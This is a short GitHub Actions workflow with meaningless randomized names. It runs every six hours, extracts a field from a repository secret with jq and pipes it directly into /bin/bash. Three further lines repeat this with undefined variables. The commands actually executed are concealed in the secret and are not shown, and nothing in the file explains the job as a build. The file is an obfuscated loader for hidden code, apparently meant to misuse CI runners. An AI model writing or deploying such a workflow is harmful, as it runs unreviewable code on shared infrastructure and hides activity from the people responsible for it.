name: weidiyi9182

on:
  workflow_dispatch:
  schedule:
    - cron: '57 1/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: weidiyi9182
        env:
          wyk8: ${{ secrets.wyk8 }}
        run: |
          echo $wyk8 | jq -r .xli5 | /bin/bash
          echo $gdw792 | jq -r .kh20 | /bin/bash
          echo $htnc62539 | jq -r .oyj180 | /bin/bash
          echo $jwrrn96 | jq -r .yav9 | /bin/bash

